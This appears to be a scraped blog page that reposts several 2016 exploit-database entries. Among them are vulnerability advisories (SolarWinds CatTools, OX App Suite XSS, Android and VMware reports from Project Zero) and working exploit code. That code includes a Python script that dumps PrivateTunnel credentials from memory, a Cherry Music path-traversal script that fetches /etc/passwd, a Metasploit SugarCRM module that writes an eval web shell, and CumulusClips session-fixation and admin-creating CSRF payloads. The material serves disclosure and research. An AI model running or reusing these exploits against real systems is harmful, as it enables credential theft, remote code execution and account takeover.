Document Title:
================
SolarWinds Kiwi CatTools Unquoted Service Path Privilege Escalation Vulnerability
Author:
========
Halil Dalabasmaz
Release Date:
==============
29 SEP 2016
Product & Service Introduction:
================================
Kiwi CatTools saves you time by automating common network configuration
tasks including the ability to automatically change and backup network
device configurations. Kiwi CatTools is a software application used by
network administrators to automate many of the tasks they
perform on a daily basis. This is the no longer available freeware version.
Kiwi CatTools automates configuration backups and management on routers,
switches and firewalls. It provides e-mail notification and compare reports
highlighting config changes. Supports Telnet, SSH, TFTP and SNMP. Kiwi CatTools
is designed by network engineers, for network engineers. We understand the tasks
you need to perform and how you work. CatTools is here to make your life easier.
It does this by scheduling batch jobs,automating changes, and reporting on the
things that matter to you as a network administrator.
Vendor Homepage:
=================
http://www.kiwisyslog.com/products/kiwi-cattools/product-overview.aspx
Vulnerability Information:
===========================
The application can be install on Windows system as a service by default service
installation selected. The application a 32-bit application and the default
installation path is "C:\Program Files (x86)" on Windows systems. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. The application work on "Local System"
privileges. A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
C:\Windows\system32>sc qc CatTools
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CatTools
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\CatTools_Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CatTools
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Vulnerability Disclosure Timeline:
=========================
13 AUG 2016 - Contact With Vendor
15 AUG 2016 - Vendor Response
15 SEP 2016 - No Response From Vendor
19 SEP 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
SolarWinds Kiwi CatTools 3.11.0
Tested On:
===========
Windows 7 Ultimate 64-Bit SP1 (EN)
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2016 | BGA Security LLC
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863129174
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=851
This is very similar to forshaw's bug (<https://code.google.com/p/android/issues/detail?id=200617>, <https://bugs.chromium.org/p/project-zero/issues/detail?id=727>).
The servicemanager, when determining whether the sender of a binder transaction is authorized to register a service via SVC_MGR_ADD_SERVICE, looks up the sender's SELinux context using getpidcon(spid), where spid is the value of the sender_pid field in the binder_transaction_data that was received from the binder driver.
This is problematic because getpidcon($pid) is only safe to use if the caller either knows that the process originally referenced by $pid can't transition from zombie to dead (normally because it is the parent or ptracer of $pid) or if the caller can validate that the process referenced by $pid can not have spawned before $pid referred to the correct process based on the age of the process that $pid points to after the getpidcon() call. (The same thing applies to pretty much any API that refers to processes using PIDs.)
This means that an attacker can, at least theoretically, register arbitrary services that would normally be provided by the system_server if he can execute / cause execution of the following operations in the right order:
- The main exploit process $exploit forks, creates process $child
- $child does $binder_fd = open("/dev/binder", ...)
- $child forks, creates process $subchild
- $child exits. The binder_proc belonging to $binder_fd still holds a reference
to $child. $child transitions to zombie status.
- The exploit repeatedly forks processes that instantly die until there are no unallocated
PIDs between ns_last_pid and $child's PID.
- $subchild sends a SVC_MGR_ADD_SERVICE binder message to the service manager
- the service manager receives the binder message. The kernel fills the
sender_pid field with the result of `task_tgid_nr_ns(sender, [...])`,
where `sender` is `t->from->proc->tsk`, the task_struct of $child.
- $exploit uses `waitpid()` to transition $child from zombie to dead status
- $exploit sends a HANDLE_APPLICATION_STRICT_MODE_VIOLATION_TRANSACTION
binder message to system_server
- system_server launches a new worker thread
(in ActivityManagerService.logStrictModeViolationToDropBox)
- the service manager calls getpidcon()
- system_server's worker thread dies
As far as I can tell, this exploit approach contains the following race conditions:
- If $exploit calls waitpid() before the service manager has performed the binder
read (more accurately, before the task_tgid_nr_ns call), the service manager sees
PID 0. This race isn't hard to win, but it would help to have some primitive to either stall
the service manager after the task_tgid_nr_ns call or at least detect whether it has
performed the binder read. On older Android versions, voluntary_ctxt_switches
in /proc/$pid/status might have helped with that, but nowadays, that's blocked.
When this race condition fails, you'll get an SELinux denial with
scontext=servicemanager.
- If the service manager calls getpidcon() before the system_server has launched a
worker thread, the call will either fail (if there is no such PID) or return the
not-yet-reaped $child process. Again, having a primitive for stalling the service manager
would be useful here.
When this race condition fails, it will cause either an SELinux denial with
scontext=untrusted_app or an "failed to retrieve pid context" error from the
service manager.
- If the system_server's worker thread dies before getpidcon(), getpidcon() will fail.
To avoid this race, it would be very helpful to be able to spawn a thread in system_server
that has a controlled or at least somewhat longer lifetime.
Because of the multiple races, it is hard to hit this bug, at least without spending days on finding ways to eliminate races or widen race windows, optimizing the exploit to not cycle through the whole pid range for every attempt and so on. Because of that, I decided to run my PoC on a patched Android build (based on android-6.0.1_r46) with the following modifications to show that, while the race window is very hard to hit, there is such a race:
-------
$ repo diff
project frameworks/base/
diff --git a/services/core/java/com/android/server/am/ActivityManagerService.java b/services/core/java/com/android/server/am/ActivityManagerService.java
index 33d0a9f..371ecd7 100644
--- a/services/core/java/com/android/server/am/ActivityManagerService.java
+++ b/services/core/java/com/android/server/am/ActivityManagerService.java
@@ -12269,6 +12269,9 @@ public final class ActivityManagerService extends ActivityManagerNative
if (report.length() != 0) {
dbox.addText(dropboxTag, report);
}
+ try {
+ Thread.sleep(2000);
+ } catch (InterruptedException e) {}
}
}.start();
return;
project frameworks/native/
diff --git a/cmds/servicemanager/service_manager.c b/cmds/servicemanager/service_manager.c
index 7fa9a39..0600eb1 100644
--- a/cmds/servicemanager/service_manager.c
+++ b/cmds/servicemanager/service_manager.c
@@ -7,6 +7,7 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
+#include <unistd.h>
#include <private/android_filesystem_config.h>
@@ -204,6 +205,9 @@ int do_add_service(struct binder_state *bs,
if (!handle || (len == 0) || (len > 127))
return -1;
+ if (uid > 1000)
+ sleep(2);
+
if (!svc_can_register(s, len, spid)) {
ALOGE("add_service('%s',%x) uid=%d - PERMISSION DENIED\n",
str8(s, len), handle, uid);
-------
These modifications widen the race windows sufficiently to be able to hit the bug with a few tries.
On the modified build, my PoC causes the following logcat output, demonstrating that the clipboard service has been replaced successfully:
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: accessFlags
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: declaringClass
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: dexFieldIndex
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: offset
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: type
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: ORDER_BY_NAME_AND_DECLARING_CLASS
06-15 21:41:00.480 11876 11876 W racer : NATIVE CODE: trying attack...
06-15 21:41:01.490 11876 11876 W racer : NATIVE CODE: child_pid == unused_pid + 1
06-15 21:41:01.490 11876 11876 W racer : NATIVE CODE: cycle_to_pid...
06-15 21:41:02.900 11876 11876 W racer : NATIVE CODE: cycle_to_pid done
06-15 21:41:04.910 992 992 E ServiceManager: SELinux: getpidcon(pid=11993) failed to retrieve pid context.
06-15 21:41:04.910 992 992 E ServiceManager: add_service('clipboard',63) uid=10052 - PERMISSION DENIED
06-15 21:41:08.920 11876 11876 W racer : NATIVE CODE: pid of last try: 11993
06-15 21:41:08.920 11876 11876 W racer : NATIVE CODE: trying attack...
06-15 21:41:09.930 11876 11876 W racer : NATIVE CODE: child_pid == unused_pid + 1
06-15 21:41:09.930 11876 11876 W racer : NATIVE CODE: cycle_to_pid...
06-15 21:41:11.330 11876 11876 W racer : NATIVE CODE: cycle_to_pid done
06-15 21:41:13.340 992 992 E ServiceManager: add_service('clipboard',63) uid=10052 - ALREADY REGISTERED, OVERRIDE
(Also, to further verify the success: After running the PoC, clipboard accesses in newly spawned apps cause null reference exceptions because the PoC's binder thread has been released in the meantime.)
The issue was tested in the android emulator, with a aosp_x86_64-eng build of the patched android-6.0.1_r46 release.
I have attached the PoC apk (with native code for aarch64 and x86_64; I'm not sure whether the PoC compiles correctly for 32bit) and the Android project tree - but as mentioned earlier, note that the PoC won't work on a build without my patches. If you want to compile it yourself, first run `aarch64-linux-gnu-gcc -static -o app/src/main/jniLibs/arm64-v8a/libracer.so racer.c -Wall -std=gnu99 && gcc -static -o app/src/main/jniLibs/x86_64/libracer.so racer.c` to compile the binaries, then build the project in Android Studio.
I believe that the proper way to fix this issue would be to let the binder driver record the sender's SELinux context when a transaction is sent and then either let the recipient extract the current transaction's SELinux context via an ioctl or store the SELinux context in the binder message. PIDs should not be used during the SELinux context lookup.
Regarding impact:
It looks as if the vulnerable code in the service manager is reachable from isolated_app context, although being isolated is probably going to make it even more difficult to trigger the bug.
After a service is replaced, already-running code should usually continue to use the old service because that reference is cached.
If there is e.g. some system_app that performs permissions checks (which use the "permission" service), it might be possible to bypass such permission checks using this bug, by replacing the real permission service with one that always grants access.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40381.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=850
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a multitude of bugs in the handling of JPEG2000 images embedded in a custom record 0x8000 inside EMF, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
The CTPViewDoc::WriteEMF function (adddress 0x100518F0) iterates over all EMF records found in the EMFSPOOL structure sent over COM1 for printing, and performs special handling of some of them. One such record is a custom type 0x8000, expected to store a JPEG2000 image wrapped in a structure similar to that of a EMF_STRETCHDIBITS record. The handler at 0x100516A0, and more specifically a further nested function at 0x1003C000 performs complete parsing of the J2K format, opening up the potential for software vulnerabilities. An example of a bug in that code area discovered in the past is a stack-based buffer overflow in the processing of record 0xff5c (Quantization Default), reported by Kostya Kortchinsky in bug #287.
Since the source code of the JPEG2000 implementation used by VMware is not publicly available, and the file format is sufficiently complex that a manual audit sounds like a dire and very ineffective option to find bugs, I have set up a fuzzing session to automate the process. As a result, with the PageHeap option enabled in Application Verifier for vprintproxy.exe, the fuzzer has managed to trigger hundreds of crashes, in a total of 39 unique code locations. Below is a list of different instructions which generated a crash, with a brief description of the underlying reason.
+----------------------------+-----------------------------------------------+
| Instruction | Reason |
+----------------------------+-----------------------------------------------+
| add [eax+edx*4], edi | Heap buffer overflow |
| cmp [eax+0x440], ebx | Heap out-of-bounds read |
| cmp [eax+0x8], esi | Heap out-of-bounds read |
| cmp [edi+0x70], ebx | Heap out-of-bounds read |
| cmp [edi], edx | Heap out-of-bounds read |
| cmp dword [eax+ebx*4], 0x0 | Heap out-of-bounds read |
| cmp dword [esi+eax*4], 0x0 | Heap out-of-bounds read |
| div dword [ebp-0x24] | Division by zero |
| div dword [ebp-0x28] | Division by zero |
| fld dword [edi] | NULL pointer dereference |
| idiv ebx | Division by zero |
| idiv edi | Division by zero |
| imul ebx, [edx+eax+0x468] | Heap out-of-bounds read |
| mov [eax-0x4], edx | Heap buffer overflow |
| mov [ebx+edx*8], eax | Heap buffer overflow |
| mov [ecx+edx], eax | Heap buffer overflow |
| mov al, [esi] | Heap out-of-bounds read |
| mov bx, [eax] | NULL pointer dereference |
| mov eax, [ecx] | NULL pointer dereference |
| mov eax, [edi+ecx+0x7c] | Heap out-of-bounds read |
| mov eax, [edx+0x7c] | Heap out-of-bounds read |
| movdqa [edi], xmm0 | Heap buffer overflow |
| movq mm0, [eax] | NULL pointer dereference |
| movq mm1, [ebx] | NULL pointer dereference |
| movq mm2, [edx] | NULL pointer dereference |
| movzx eax, byte [ecx-0x1] | Heap out-of-bounds read |
| movzx eax, byte [edx-0x1] | Heap out-of-bounds read |
| movzx ebx, byte [eax+ecx] | Heap out-of-bounds read |
| movzx ecx, byte [esi+0x1] | Heap out-of-bounds read |
| movzx ecx, byte [esi] | Heap out-of-bounds read |
| movzx edi, word [ecx] | NULL pointer dereference |
| movzx esi, word [edx] | NULL pointer dereference |
| push dword [ebp-0x8] | Stack overflow (deep / infinite recursion) |
| push ebp | Stack overflow (deep / infinite recursion) |
| push ebx | Stack overflow (deep / infinite recursion) |
| push ecx | Stack overflow (deep / infinite recursion) |
| push edi | Stack overflow (deep / infinite recursion) |
| push esi | Stack overflow (deep / infinite recursion) |
| rep movsd | Heap buffer overflow, Heap out-of-bounds read |
+----------------------------+-----------------------------------------------+
Considering the volume of the crashes, I don't have the resources to investigate the root cause of each of them, and potentially deduplicate the list even further. My gut feeling is that the entirety of the crashes may represent 10 or more different bugs in the code.
Attached is a Python script which can be used to test each particular JPEG2000 sample: it is responsible for wrapping it in the corresponding EMF + EMFSPOOL structures and sending to the COM1 serial port on the guest system. It is a reworked version of Kostya's original exploit from bug #287. In the same ZIP archive, you can also find up to three samples per each crash site listed above.
It was empirically confirmed that some of the heap corruptions can be leveraged to achieve arbitrary code execution, as when the Page Heap mechanism was disabled, the process would occasionally crash at invalid EIP or a CALL instruction referencing invalid memory addresses (vtables).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40399.zip
#####
# PrivateTunnel Client v2.7.0 (x64) Local Credentials Disclosure After Sign out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.privatetunnel.com
# Date 14/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
#####
# PrivateTunnel Client v2.7.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that PrivateTunnel does store the supplied credentials while the user is logged in and after sign out in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to PrivateTunnel account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
usr = ''
pwd = ''
found = 0
filename = "privatetunnel2.7.0.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "###########################################################################"
print "# PrivateTunnel v2.7.0 Local Credentials Disclosure Exploit After Sign out#"
print "#\t\tBug Discovery by Yakir Wizman, Victor Minin\t\t #"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t #"
print "#\t\t\tPlease use responsibly.\t\t\t\t #"
print "###########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
user_pattern = '\x20\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x3A\x20\x22(.*)\x22\x2C\x0A\x20\x20\x20\x22\x75\x73\x65\x72\x6E\x61\x6D\x65\x22\x20\x3A\x20\x22(.*)\x22\x0A'
for address in process.search_regexp(user_pattern):
memory_dump.append(address)
try:
usr = memory_dump[0][2].split('"username" : "')[1].replace('"\n', '')
pwd = memory_dump[0][2].split('"password" : "')[1].split('",')[0]
except:
pass
print ""
if usr != '' and pwd !='':
found = 1
print "[+] PrivateTunnel Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 46484 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev46, 7.6.3-rev14, 7.8.0-rev29, 7.8.1-rev16, 7.8.2-rev5
Vendor notification: 2016-06-09
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Description fields of ressources could be used to inject malicious HTML/JS code. When scheduling group appointments and adding such a ressource, the injected code gets executed in the context of a user when viewing appointment details.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Note however that explicit permissions are required to create or modify resources in a way that they could contain script code.
Steps to reproduce:
1. Provide HTML including script code as resource description
2. Add this resource to a group appointment
3. As group members, examine the appointment details.
Solution:
Permission settings can be temporarily tightened to reject resource modifications by users. Such descriptions are now handled as plain-text to avoid any kind of script execution. Operators should update to the latest Patch Release.
Internal reference: 46894 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Researcher credits: Jakub A>>oczek
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be injected to HTML E-Mail hyperlinks by using the "data" schema. This method bypasses existing sanitization methods. As a result the script code got injected to hyperlinks displayed at OX App Suite UI.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Compose malicious mail with a link containing a "data" schema with JS code included
2. Make a user click the link
Proof of concept:
<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>
Solution:
Users should not or interact with mails from untrusted external sources. Targets of hyperlinks shall be examined before clicking the respective link. Operators should update to the latest Patch Release.
Internal reference: 47062 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be stored to the temporary storage for inline-images in HTML E-Mails. Content is available to the user who stored it but also to other (external) users if the unique random ID is known. Note that this storage is volatile and expires if not regulary refreshed. A attacker could however re-upload and refresh the file once uploaded.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a file with script code that gets rendered within the browser, e.g. a SVG image with XSL headers
2. Alter the upload request for file?action=new from "image" to "file" to circumvent image related checks
3. Set a MIME-type that makes the browser render the file content inline instead of downloading
4. Fetch the returned UUID
5. Create a link which includes the storage location for the specific item
6. Make a user click that link
Solution:
Users should not open hyperlinks from untrusted sources. Operators should update to the latest Patch Release.
Product: OX Guard
Vendor: OX Software GmbH
Internal reference: 47878 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-03
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6854
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Add JS code to a mail body
2. Use PGP inline signatures
3. Open the mail in OX App Suite
Solution:
Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.
Internal reference: 47914 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: secator
Vendor notification: 2016-08-05
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6853
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. As attacker, create a PGP key with malicious name
2. Get the key ID and create a link which will fetch that key
3. Make the victim call that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.
Internal reference: 48080 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-15
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6851
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication is needed.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user has a active session on the same domain already.
Steps to reproduce:
1. As attacker, create a hyperlink with script code included at the "templid" parameter
2. Make the victim open that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release.
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
import urllib2, cookielib, urllib
#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
if c.name == "session_id":
session_id = c.value
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
zipFile.write(response)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SugarCRM REST Unserialize PHP Code Execution',
'Description' => %q{
This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
which could be abused to allow unauthenticated users to execute arbitrary PHP code with
the permissions of the webserver. The dangerous unserialize() call exists in the
'/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
},
'Author' => 'EgiX',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://karmainsecurity.com/KIS-2016-07'],
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
['URL', 'https://bugs.php.net/bug.php?id=72663']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['SugarCRM CE <= 6.5.23', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 23 2016'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
], self.class)
end
def exploit
upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'
payload_serialized = "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'service/v4/rest.php'),
'method' => 'POST',
'vars_post' => {
'method' => 'login',
'input_type' => 'Serialize',
'rest_data' => payload_serialized
}
})
if not res or res.code != 200
print_error("#{peer} - Exploit failed: #{res.code}")
return
end
register_files_for_cleanup(File.basename(upload_php))
print_status("#{peer} - Executing the payload #{upload_php}")
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, upload_php),
'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
})
if res and res.code != 200
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end
end
end
# Exploit Title: CumulusClips Session fixation
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
Description:
CumulusClips is a video sharing script that allows you to start your own
video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS &
Android mobile devices, as well as all the major browsers.
PoC:
POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/
Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 211
title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID%
3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C%
2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url=
BOZtzZX&submitted=TRUE&button=Update+Video
Remediation:
Change session id after sucessful login
Post exploitation:
Since it is posible to impersonate admin there is possibility for a code
execution and unrestricted file upload in admin panel.
#######################################################
# Exploit Title: CumulusClips XSRF and code execution
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
PoC:
<html>
<body>
<form action="http://192.168.122.203/cumulusclips/cc-admin/members_add.php" method="POST">
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="email" value="admin@mailinator.com" />
<input type="hidden" name="username" value="newadmin" />
<input type="hidden" name="password" value="newadminpass" />
<input type="hidden" name="password-show" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="last_name" value="" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="about_me" value="" />
<input type="hidden" name="submitted" value="TRUE" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Remediation:
Use anti-csrf token, fix all XSS'es
